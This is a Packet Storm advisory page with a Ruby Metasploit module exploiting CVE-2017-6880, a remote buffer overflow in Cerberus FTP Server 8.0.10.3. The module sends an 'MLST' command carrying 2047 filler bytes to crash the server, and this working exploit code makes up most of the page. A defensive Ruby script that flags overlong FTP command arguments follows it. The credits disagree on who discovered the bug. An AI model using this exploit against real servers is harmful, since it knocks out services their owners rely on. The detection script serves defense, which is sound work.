Source: Packet Storm, Souhardya Sardar, PACKETSTORM:142502
Published: May 15, 2017

Cerberus FTP 8.0.10.3 MLST Buffer Overflow


EPSS: 0.042 (Low), percentile 92.3%

```ruby
#!/usr/share/ruby

#[+] Title: Cerberus FTP Server 8.0.10.3 - 'MLST' Remote Buffer Overflow
#[+] Credits / Discovery: Nassim Asrir
#[+] Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
#[+] Metasploit Module Author : Souhardya Sardar
#[+] Metasploit Module Author Contact: github.com/Souhardya | [email protected]
#[+] Author Company: Henceforth
#[+] CVE: CVE-2017-6880

#Vendor:
#===============
#
#https://www.cerberusftp.com/


#Download:
#===========
#
#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)


#Vulnerability Type:
#===================
#
#Remote Buffer Overflow.


# ----------------------------
# Module Dependencies/requires
# ----------------------------

require 'msf/core'

# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  # -----------------------------------------
  # Initialize information
  # -----------------------------------------

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Cerberus FTP Remote Buffer Overflow',
      'Description' => %q{
        This module exploits a buffer overflow in the Cerberus FTP Server that is triggered
        by sending a string of 2047 "A" characters as the argument of the "MLST" command.
      },
      'Author'      =>
        [
          'Module Author And Bug Discovered by : Peter Baris',
          'Coded by : Souhardya Sardar (github.com/Souhardya)', # metasploit module :)
          'Thanks to : Nidhish Pandya' # auditing :)
        ],
      'License'     => UNKNOWN_LICENSE, # the original used the undefined constant NONE
      'Platform'    => ['win'],
      'References'  =>
        [
          [ 'CVE', '2017-6880' ],
          # Reference code taken from the original PoC located here:
          [ 'URL', 'https://www.exploit-db.com/exploits/41620/' ]
        ]))

    register_options(
      [
        OptPort.new('SRVPORT', [true, 'The remote FTP server port', 21])
      ], self.class)
    deregister_options('FTPUSER', 'FTPPASS')
  end

  def exploit
    connect

    # Overlong MLST argument: 2047 filler bytes, no shellcode
    payload = 'A' * 2047

    # The module defines no Targets, so report the configured host instead of target.name
    print_status("Trying to connect to target server #{rhost}:#{rport}...")

    # Double quotes are required so that \r\n is sent as a real CRLF
    sock.put('MLST ' + payload + "\r\n")

    handler
    disconnect
  end

end
```
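For defenders, the request this module sends is easy to recognise on the FTP control channel: an `MLST` command whose argument is far longer than any real path and consists of one repeated byte. The following is an added detection sketch, not part of the original module or of Cerberus FTP; `MAX_ARG_LEN`, `Finding` and `scan_ftp_commands` are names chosen here, the 512-byte limit is an assumed policy value, and the sample stream is constructed.

```ruby
# Added example: flag overlong FTP command arguments in a captured
# client-to-server control stream. MAX_ARG_LEN is an assumed policy limit.
MAX_ARG_LEN = 512

Finding = Struct.new(:verb, :arg_len, :terminated, :reason)

# Returns one Finding per command line that violates the length policy.
# Handles a final line with no CRLF, since an oversized request may be
# captured before (or without) its terminator.
def scan_ftp_commands(stream, max_arg_len: MAX_ARG_LEN)
  data  = stream.dup.force_encoding(Encoding::BINARY)
  lines = data.split("\r\n", -1)      # limit -1 keeps the trailing field
  tail  = lines.pop || ''             # bytes after the last CRLF
  entries = lines.map { |l| [l, true] }
  entries << [tail, false] unless tail.empty?

  entries.each_with_object([]) do |(line, terminated), findings|
    verb, arg = line.split(' ', 2)
    next if verb.nil?
    arg ||= ''
    reasons = []
    reasons << 'argument exceeds limit' if arg.bytesize > max_arg_len
    # Longest run of one repeated byte, typical of filler padding
    run = arg.each_byte.chunk_while { |a, b| a == b }.map(&:size).max || 0
    reasons << 'long single-byte run' if run > max_arg_len / 2
    next if reasons.empty?
    findings << Finding.new(verb.upcase, arg.bytesize, terminated,
                            reasons.join('; '))
  end
end

# Constructed sample: two benign commands, one oversized MLST, one NOOP.
SAMPLE = "USER anonymous\r\nMLST readme.txt\r\nmlst " + ('A' * 2047) +
         "\r\nNOOP\r\n"

if __FILE__ == $PROGRAM_NAME
  scan_ftp_commands(SAMPLE).each do |f|
    puts "#{f.verb} arg=#{f.arg_len}B terminated=#{f.terminated} (#{f.reason})"
  end
end
```

The same length check can be enforced inline by an FTP-aware proxy or expressed as an IDS rule on the control port.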
